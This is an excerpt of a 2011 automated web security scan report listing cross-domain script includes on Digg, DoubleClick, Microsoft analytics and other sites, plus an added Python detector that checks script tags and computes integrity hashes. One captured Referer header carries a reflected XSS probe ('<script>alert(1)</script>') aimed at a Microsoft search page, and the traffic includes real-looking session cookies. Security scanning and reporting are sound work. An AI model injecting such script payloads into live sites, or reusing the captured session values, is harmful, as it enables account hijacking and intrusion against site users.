Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 200 OK
Server: Resin/3.0.24
ETag: "FosXLUyhIoJ"
Last-Modified: Tue, 08 Mar 2011 00:51:49 GMT
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 41592
Date: Wed, 06 Jul 2011 11:22:06 GMT
Connection: close
Cache-Control: max-age=315360000

/*
   mediaboxAdvanced v1.3.4b - The ultimate extension of Slimbox and Mediabox; an all-media script
   updated 2010.09.21
       (c) 2007-2010 John Einselen <http://iaian7.com>
   based on Slimbox v1.64 - The u
...[SNIP]...
<br/>Adobe Flash is either not installed or not up to date, please visit <a href="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash" title="Get Flash" target="_new">Adobe.com</a>
...[SNIP]...

16. Cross-domain script include
There are 40 instances of this issue:

Issue background

When an application includes a script from an external domain, the browser executes that script within the security context (origin) of the invoking page. The script can therefore do anything the application's own scripts can do: read application data, including the DOM and any cookie not marked HttpOnly, and perform actions as the current user.

Including a script from an external domain therefore means trusting that domain with the data and functionality of your application, and trusting that domain's own security to prevent an attacker from modifying the script. Several of the includes recorded below are fetched over plain http://, so the script can also be altered by anyone on the network path, regardless of how well the third party protects its servers.

Issue remediation

Scripts should not be included from untrusted domains. If a third-party script fulfils a genuine requirement, the preferred fix is to copy its contents onto your own domain and include it from there, so that you control exactly what is served. If that is not possible (for example, for licensing reasons, or because the script changes too often to mirror), consider reimplementing the functionality in your own code. Where a remote include must remain, load it over https:// and pin its content with a Subresource Integrity (integrity) attribute so the browser refuses a modified copy; a Content Security Policy script-src directive listing only the expected hosts further limits where scripts may be loaded from, though it does not pin their content. (Both mechanisms postdate this 2011 report and are noted here as current practice.)
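As an added example, not part of the scanner output or of any site listed in it, the following Python script performs the check this section reports: it finds <script src> includes whose host differs from the host that served the page and flags any that lack an integrity attribute or are loaded over plain HTTP. It also computes the Subresource Integrity value for a script body, which is the value a site would put in the integrity attribute when it keeps a remote include. The sample HTML and the script body are constructed for the demonstration; the hostnames mirror the about.digg.com findings below.

```python
"""Detect cross-domain <script src> includes and compute an SRI integrity value.

Added example; not part of the Burp report or of any site it lists.
The sample HTML and script body at the bottom are constructed.
"""
import base64
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlsplit


class ScriptSrcCollector(HTMLParser):
    """Collect the attributes of every <script> tag that has a src."""

    def __init__(self):
        super().__init__()
        self.scripts = []  # list of (src, attrs dict)

    def handle_starttag(self, tag, attrs):
        if tag != "script":  # HTMLParser lowercases tag names
            return
        attrs = dict(attrs)
        if attrs.get("src"):
            self.scripts.append((attrs["src"], attrs))


def script_host(src, page_host):
    """Host a script src resolves to; relative URLs resolve to the page host."""
    netloc = urlsplit(src).netloc
    if netloc:
        return netloc.lower().split(":")[0]  # drop any port
    return page_host.lower()


def cross_domain_scripts(html, page_host):
    """Return one dict per script loaded from a host other than page_host.

    This mirrors the scanner's check (script host != page host) and adds the
    two facts a reviewer wants next: whether the include is pinned with an
    integrity attribute, and which scheme it is fetched over ("relative" for
    scheme-relative //host/... URLs, which inherit the page's scheme).
    """
    parser = ScriptSrcCollector()
    parser.feed(html)
    findings = []
    for src, attrs in parser.scripts:
        host = script_host(src, page_host)
        if host == page_host.lower():
            continue
        findings.append({
            "src": src,
            "host": host,
            "has_integrity": "integrity" in attrs,
            "scheme": urlsplit(src).scheme or "relative",
        })
    return findings


def sri_attribute(script_body, algorithm="sha384"):
    """Integrity attribute value for a script body (bytes): '<alg>-<base64 digest>'."""
    digest = hashlib.new(algorithm, script_body).digest()
    return f"{algorithm}-{base64.b64encode(digest).decode('ascii')}"


# Constructed sample: a page on about.digg.com pulling one script from its own
# host and two from other domains, one over plain HTTP as in the report.
SAMPLE_HTML = """
<html><head>
<script src="/js/local.js"></script>
<script type="text/javascript" src="http://developers.diggstatic.com/files/js/js_8f62bc98108fbe132c288c6283f26d44.js"></script>
<script src="//cdn.example.invalid/lib.js" integrity="sha384-AAAA"></script>
</head><body></body></html>
"""

if __name__ == "__main__":
    for f in cross_domain_scripts(SAMPLE_HTML, "about.digg.com"):
        notes = []
        if not f["has_integrity"]:
            notes.append("no integrity attribute")
        if f["scheme"] == "http":
            notes.append("fetched over plain HTTP")
        print(f"{f['host']:28} {f['src']}  {'; '.join(notes)}")
    # Pin a (constructed) script body: paste the result into integrity="...".
    print(sri_attribute(b"console.log('hello');"))
```

Run it against a saved response body to reproduce the scanner's list for one page; the integrity value is only meaningful if the remote script is stable, since any change to the file makes the browser refuse it.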


16.1. http://about.digg.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://about.digg.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESSffbdf82fc09bcc0e216782b4624d5374=96839786b8fdb7818a75089363be3cac; expires=Fri, 29-Jul-2011 14:54:34 GMT; path=/; domain=.about.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:14 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17973


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
</script>
<script type="text/javascript" src="http://developers.diggstatic.com/files/js/js_8f62bc98108fbe132c288c6283f26d44.js"></script>
...[SNIP]...

16.2. http://about.digg.com/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://about.digg.com
Path:   /ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ads HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESSffbdf82fc09bcc0e216782b4624d5374=8d9cb78aa1d77381647579b491d16261; expires=Fri, 29-Jul-2011 14:54:34 GMT; path=/; domain=.about.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:14 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 7213
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
</script>
<script type="text/javascript" src="http://developers.diggstatic.com/files/js/js_5bbcd6ad326461eca34aa632bf360727.js"></script>
...[SNIP]...

16.3. http://about.digg.com/blog

Summary

Severity:   Information
Confidence:   Certain
Host:   http://about.digg.com
Path:   /blog

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /blog HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESSffbdf82fc09bcc0e216782b4624d5374=d3bd911c4412a5f105a30b014982aaed; expires=Fri, 29-Jul-2011 14:54:36 GMT; path=/; domain=.about.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:16 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15614


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
</script>
<script type="text/javascript" src="http://developers.diggstatic.com/files/js/js_8f62bc98108fbe132c288c6283f26d44.js"></script>
...[SNIP]...

16.4. http://about.digg.com/contact

Summary

Severity:   Information
Confidence:   Certain
Host:   http://about.digg.com
Path:   /contact

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /contact HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESSffbdf82fc09bcc0e216782b4624d5374=183f9d06f7faf23f4425f2bca06ffba5; expires=Fri, 29-Jul-2011 14:54:36 GMT; path=/; domain=.about.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:16 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 7886
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
</script>
<script type="text/javascript" src="http://developers.diggstatic.com/files/js/js_cb92efda53d6dfcba92cf898d0c2f350.js"></script>
...[SNIP]...

16.5. http://about.digg.com/faq

Summary

Severity:   Information
Confidence:   Certain
Host:   http://about.digg.com
Path:   /faq

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /faq HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESSffbdf82fc09bcc0e216782b4624d5374=2eb23705fdf587154cd28b12c4d39ae6; expires=Fri, 29-Jul-2011 14:54:36 GMT; path=/; domain=.about.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:16 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25290


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
</div>
<script type="text/javascript" defer="defer" src="http://developers.diggstatic.com/sites/all/modules/digg/js/faq-tracking.js?9"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://developers.diggstatic.com/files/js/js_4aa5757d2430db20fabb438d36c046b7.js"></script>
...[SNIP]...

16.6. http://about.digg.com/partnership

Summary

Severity:   Information
Confidence:   Certain
Host:   http://about.digg.com
Path:   /partnership

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /partnership HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESSffbdf82fc09bcc0e216782b4624d5374=81512413a75972f559239632a17b7d62; expires=Fri, 29-Jul-2011 14:54:35 GMT; path=/; domain=.about.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:15 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 8103


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
</script>
<script type="text/javascript" src="http://developers.diggstatic.com/files/js/js_5bbcd6ad326461eca34aa632bf360727.js"></script>
...[SNIP]...

16.7. http://about.digg.com/privacy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://about.digg.com
Path:   /privacy

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /privacy HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESSffbdf82fc09bcc0e216782b4624d5374=5dae80891524c3f10a5dd8dcaee38263; expires=Fri, 29-Jul-2011 14:54:37 GMT; path=/; domain=.about.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:17 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16757


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
</script>
<script type="text/javascript" src="http://developers.diggstatic.com/files/js/js_5bbcd6ad326461eca34aa632bf360727.js"></script>
...[SNIP]...

16.8. http://about.digg.com/terms-use

Summary

Severity:   Information
Confidence:   Certain
Host:   http://about.digg.com
Path:   /terms-use

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /terms-use HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESSffbdf82fc09bcc0e216782b4624d5374=790163a5d0bb3c66f0901f4df9eaeead; expires=Fri, 29-Jul-2011 14:54:37 GMT; path=/; domain=.about.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:17 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24783


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
</script>
<script type="text/javascript" src="http://developers.diggstatic.com/files/js/js_5bbcd6ad326461eca34aa632bf360727.js"></script>
...[SNIP]...

16.9. http://ad.doubleclick.net/adi/N3285.google/B2343920.122

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.122

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N3285.google/B2343920.122;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B-uRkF00UTuLRH4H3lQfH3smdAYuv__wB8_Gl6Biz9fHdSuDrJRABGAEgvs7lDTgAUIGjhfIDYMnW8obIo_waoAH9pPvoA7oBCTcyOHg5MF9hc8gBCdoBbGZpbGU6Ly8vRDovYWN1bmV0aXhfcmVwb3J0cy9yZXBvcnRzL2FkZHRoaXNjb20vZG9tLWJhc2VkLXhzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE&num=1&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA&client=ca-pub-4063878933780912&adurl=;ord=145924632? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1309971302&flash=10.3.181&url=file%3A%2F%2F%2FD%3A%2Facunetix_reports%2Freports%2Faddthiscom%2Fdom-based-xss-reflected-cross-site-scripting-example-poc.html&dt=1309953302639&bpp=4&shv=r20110622&jsv=r20110627&correlator=1309953302996&jscb=1&frm=4&adk=1607234649&ga_vid=1503131442.1309953303&ga_sid=1309953303&ga_hid=870491465&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=806&fu=0&ifi=1&dtd=767&xpc=T0UwuNN7Sv&p=file%3A//
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4847
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 06 Jul 2011 11:55:05 GMT
Expires: Wed, 06 Jul 2011 11:55:05 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

16.10. http://analytics.microsoft.com/Sync.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://analytics.microsoft.com
Path:   /Sync.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Sync.html HTTP/1.1
Host: analytics.microsoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.microsoft.com/Preference.aspx?bd498%22%3E%3Cscript%3Ealert(1)%3C/script%3Ef1d3c6b4585=1
Cookie: A=I&I=AxUFAAAAAABeBwAAdiWT9utCiviB3HCxuYLMlg!!&M=1; MC1=GUID=da1fbe1efa0ae044924b597eae0c35af&HASH=1ebe&LV=20116&V=3; omniID=1308621908165_e848_1389_f5bb_98e500b1fd19; WT_FPC=id=173.193.214.243-2855267600.30158775:lv=1308648584991:ss=1308648377209; WT_NVR_RU=0=technet:1=:2=; msdn=L=1033; s_nr=1308622093188; s_vnum=1311214093190%26vn%3D1; _opt_vi_64WS79UG=C78BD0AA-E1D9-4F06-8CD8-1337F190ABC8; MUID=3957719BE8F34A5DA51D204E7E06704A; MSID=Microsoft.CreationDate=06/21/2011 02:08:26&Microsoft.LastVisitDate=06/21/2011 12:29:48&Microsoft.VisitStartDate=06/21/2011 12:26:20&Microsoft.CookieId=2ad2bd8a-437d-4ebd-affe-5214ddd829eb&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=6&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0479-3054-8088-8697; stFI=Thu%2C%2021%20Jul%202011%2002%3A08%3A34%20GMT; UserState=Returning=False&LastVisit=06/21/2011 12:29:32&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=ab73286e-0ac2-4078-b206-f36cf569711d&RegUser=

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sat, 07 May 2011 00:59:31 GMT
Accept-Ranges: bytes
ETag: "e94f40652ccc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Wed, 06 Jul 2011 11:25:53 GMT
Content-Length: 607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Sync</title>
...[SNIP]...
</span>
<script type="text/javascript" src="//analytics.atdmt.com/Scripts/wlHelper.js?i=MUID"></script>
<script type="text/javascript" src="//analytics.live.com/Scripts/wlHelper.js?i=ANID"></script>
...[SNIP]...

16.11. http://analytics.msn.com/Include.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://analytics.msn.com
Path:   /Include.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Include.html HTTP/1.1
Host: analytics.msn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://analytics.microsoft.com/Sync.html
Cookie: MC1=V=3&GUID=af7f3bc9414d4d7f98f7762d0ecd4c67; mh=LENOVO; CC=US; CULTURE=EN-US; MSNRPSShare=1; MUID=3957719BE8F34A5DA51D204E7E06704A; Sample=87; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b48&W=1; NAP=V=1.9&E=aee&C=1y2a1t4TVNCPNy9y9DmWgYg0jNzUVxeHBpRB9YpCzs7AkrhVIlPNyg&W=1; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=a7ed379634844c0891f7fd0905cd7d4e&bd=2011-07-02T23:40:18.696&v=2; SRCHHPGUSR=AS=1; MSNTVID=af7f3bc9414d4d7f98f7762d0ecd4c67

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sat, 07 May 2011 00:59:27 GMT
Accept-Ranges: bytes
ETag: "fa66cf352ccc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Wed, 06 Jul 2011 11:25:57 GMT
Content-Length: 464

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Sync</title>
...[SNIP]...
</span>
<script type="text/javascript" src="//analytics.atdmt.com/Scripts/wlHelper.js?i=MUID"></script>
<script type="text/javascript" src="//analytics.live.com/Scripts/wlHelper.js?i=ANID"></script>
...[SNIP]...

16.12. http://bcp.crwdcntrl.net/px

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /px

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /px?Yz0zNCZweGlkPTExNjgmcHhpZD01MzMmcHhpZD01NzY2JnB4aWQ9NTU2OCZweGlkPTYzOTMmcHhpZD01MyZweGlkPTI0NyZweGlkPTEyODYmcHhpZD01NzQ4 HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/4/c=34%7Crand=395066690%7Cpv=y%7Crt=ifr
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aud=ABR4nC2STSgEcRjG%2F8KmbWZndtqZETdx1aacuXBAuzeKC0VOyldYp3FyEBcXxYGkpNxcfLSiFptyIeUsHLeURMR6fvYwv57363n%2Fb2uMMZlUR9aYivRPc37UjBnjNpi%2FX9AtJN5RPYLbJFi35D7JtRN8EOw7Ib5PyYsQZgnuCP4Qahs1KDjfBDeEFH7xNdrHMRrG6AOVE7w0wVJkorL7F7lJ8N83I1TXUbnKnou8iJw7i5GFmsD9ETUnxGxK2rAdkZ%2FLns4KlRnA6bwpVB9qmnYu6PaDAU7wJphlhnEeJycH%2F4mSZ4LzBEtSSe4ZsGdNC6e7obIT200h0Ys6pf2CvldGF%2Bi7R52rxDui8opgkfYiuWshiJiygF8jK%2FEU%2F1CwK1EM8wrMPAHsEixRWU%2FllmAlULs4rHMeHu3EeJGPqhLCPPe8ZE%2BOFR7TfoBDK8E9obZLiPPHTJ6VP7%2FnjlOd; cc=ACN4nGNQSEy0MDI3SjG0MDC1sDRNTDK3MEtMSzYyM0tLMjU3SbVkAAI%2FEVf%2F%2F4ezrzAwMBr819uXDhJjEBb4tpuFgeEsA8N%2FEFcSQjNaTM%2F4zwhkfFkZAuY3MDAJfNtPrMI9RClkEfi2jVgTtxOnUFDFkDirBRXziFQoOZVIqyWnE6twGrG%2BvkKcG4X5u4k18QKxCi8Rq%2FAUcW6Uz2si1sRDxClMqKgjzuqEinriFDI4CX6fzczAoARUwsgI1cII1QISUAo7k41sVANYntGiAaL%2BC4QfqOLEDFfEaIkqqbXHFLdkWlUAyPjp6QhrwS5NhyiCiIedqcBtgsz%2FI%2FgkTyO7HhgAYNeDAgJsfAbE9dG4TQg7UwAyoQEtKFEV%2Be8qIBxIWnsUcFsj%2BL2NGW4NumSgSgxhX8iaXWRDRCA0QuEmQSIUSRMwDTCCI1hOvxy3swJ495FlqPeXEnwJQga3ZOAiZrJs1NojgdtQhf3N%2BJwjSjh0ueobyHKWm%2FU5vNnLP38vXnmF%2Fe24Xe5mfRa3pPeXdHySabgl5Qy34JYUVrPE62DvL%2Fl45YXV8JQGQdVM2HIBpLxSTP5OOJP5568jnF3DhDPwpZU3eCQ38BNOK27WC%2FHF2SLckqE9M%2FHpXI2nmBKuxC3pn3%2BUcMi5WW%2FHZ8Jh3JLxLLvxOawAt2Si5TnCpb%2F8DD7CURqoIoU32cWz7CEccWGqlYTDKfW%2BLGE3K1zCE15eL66DTciAmIDuFkhq52qdRFaBE6iihKdwVVHGLam4rI6w72X%2B7yemQtXGGxleL27gzuZeL27hlgQA%2FDTnsA%3D%3D; OAID=aa8272d1805895ab786afc266fb574e9

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:22:09 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 1170
Connection: close

<html><body><div><img src="https://ad.yieldmanager.com/pixel?id=1170133&t=2" width="1" height="1" /><img src="http://ads.adbrite.com/adserver/behavioral-data/8203?d=2723" width="1" height="1"><iframe
...[SNIP]...
<!-- "Network Pixel" c/o "Lotame", segment: 'Tech Savvy' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<script src="http://segment-pixel.invitemedia.com/pixel?code=2716&partnerID=88&key=segment&returnType=js"></script>
...[SNIP]...

16.13. https://blog.metricstream.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://blog.metricstream.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: blog.metricstream.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:404-BGD-511&token:_mch-metricstream.com-1309960802844-32266; __utma=216666762.365739093.1309960803.1309960803.1309960803.1; __utmc=216666762; __utmz=216666762.1309960803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=216666762.9.10.1309960803

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:46:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Pingback: https://blog.metricstream.com/xmlrpc.php
Connection: close
